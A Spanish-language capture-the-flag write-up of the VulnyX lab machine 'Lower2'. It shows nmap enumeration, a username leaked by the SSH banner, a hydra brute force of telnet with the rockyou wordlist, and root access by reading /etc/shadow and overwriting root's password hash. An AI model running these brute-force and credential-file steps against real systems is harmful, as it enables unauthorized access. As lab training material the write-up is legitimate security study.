cd ~/blog

~/writeups/vulnyx/28-lower2.md

28 - Lower2

low Linux vulnyx 25-10-2025
Username disclosure via SSH bannerTelnet brute forceshadow group + writable /etc/shadow Privesc
vulnyx.com

~1 min de lectura


Identificamos la IP de la máquina víctima:

 arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.42.113.231

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.42.113.231
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-10-25 13:39 -0300
Nmap scan report for 10.42.113.231
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
23/tcp open  telnet
80/tcp open  http
MAC Address: 08:00:27:11:B1:F6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.33 seconds
 nmap -sCV -p 22,23,80 -oN 02-targeted.txt 10.42.113.231
Starting Nmap 7.98 ( https://nmap.org ) at 2025-10-25 13:39 -0300
Nmap scan report for 10.42.113.231
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
23/tcp open  telnet  Netkit telnet-ssl telnetd
80/tcp open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.13 seconds

Una conexión por SSH muestra un banner que revela el nombre de usuario del sistema:

 ssh root@10.42.113.231

###################################################
### Welcome to Brian Taylor's (b.taylor) server ###
###################################################

root@10.42.113.231: Permission denied (publickey).

Con el usuario b.taylor, hacemos fuerza bruta contra el servicio telnet:

 hydra -l 'b.taylor' -P ~/Documents/wordlists/rockyou.txt 10.42.113.231 telnet -t 64
...
[23][telnet] host: 10.42.113.231   login: b.taylor   password: rockyou
...

Nos conectamos por telnet y obtenemos la primera flag:

 telnet 10.42.113.231
Trying 10.42.113.231...
Connected to 10.42.113.231.
Escape character is '^]'.

lower2 login: b.taylor
Password: rockyou
Last login: Sat Oct 25 19:18:17 CEST 2025 from 10.42.113.35 on pts/2
b.taylor@lower2:~$

Para escalar privilegios, revisamos los grupos del usuario y vemos que pertenece al grupo shadow:

b.taylor@lower2:~$ id
uid=1000(b.taylor) gid=1000(b.taylor) grupos=1000(b.taylor),42(shadow)

El grupo shadow otorga acceso a /etc/shadow, que además resulta escribible (Writable Critical Files Privesc). Leemos el hash de root:

b.taylor@lower2:~$ ls -l /etc/shadow
-rw-rw---- 1 root shadow 749 feb 16  2025 /etc/shadow

b.taylor@lower2:~$ cat /etc/shadow | grep root
root:$y$j9T$RDW/7EgA4sElvqxLVk.Uo.$OmF5Lm4Ub/UeC2ua6tTQnHB07WKpYs1lOXl.lS581q8:20134:0:99999:7:::

Generamos un hash de contraseña vacía con openssl y sustituimos el de root:

 openssl passwd -1
Password:
Verifying - Password:
$1$3rtnhbQf$d6bF.2.8NcXKURXi.E8fg/

Editamos /etc/shadow con nano y nos autenticamos como root con contraseña vacía:

b.taylor@lower2:~$ cat /etc/shadow | grep root
root:$1$3rtnhbQf$d6bF.2.8NcXKURXi.E8fg/:20134:0:99999:7:::

b.taylor@lower2:~$ su root
Contraseña:
root@lower2:/home/b.taylor#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados